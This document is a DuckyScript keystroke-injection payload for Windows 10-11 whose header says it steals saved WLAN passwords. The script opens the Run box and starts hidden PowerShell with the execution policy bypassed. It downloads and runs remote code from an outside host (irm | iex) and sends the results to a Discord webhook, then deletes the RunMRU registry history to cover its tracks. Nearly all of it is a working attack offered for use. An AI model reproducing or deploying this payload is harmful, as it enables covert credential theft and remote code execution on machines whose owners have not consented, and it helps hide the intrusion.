REM ###################################################################
REM #                                                                 |
REM # Title        : WLAN-Windows-Passwords-Discord-Exfiltration      |
REM # Author       : RemoTheDev                                       |
REM # Description  : A script used to exfil target WLAN Passwords.    |
REM # Category     : Credentials                                      |
REM # Target       : Windows 10-11                                    |
REM # Version      : 1.0                                              |
REM #                                                                 |
REM ###################################################################

DELAY 2000
GUI r
DELAY 250
STRINGLN powershell -w h -ep bypass $discord='https://discord.com/api/webhooks/<channel_id>/<webhook_id>';irm winwifidiscord.remothe.dev | iex
DELAY 3000
GUI r
DELAY 500
STRINGLN powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" | iex


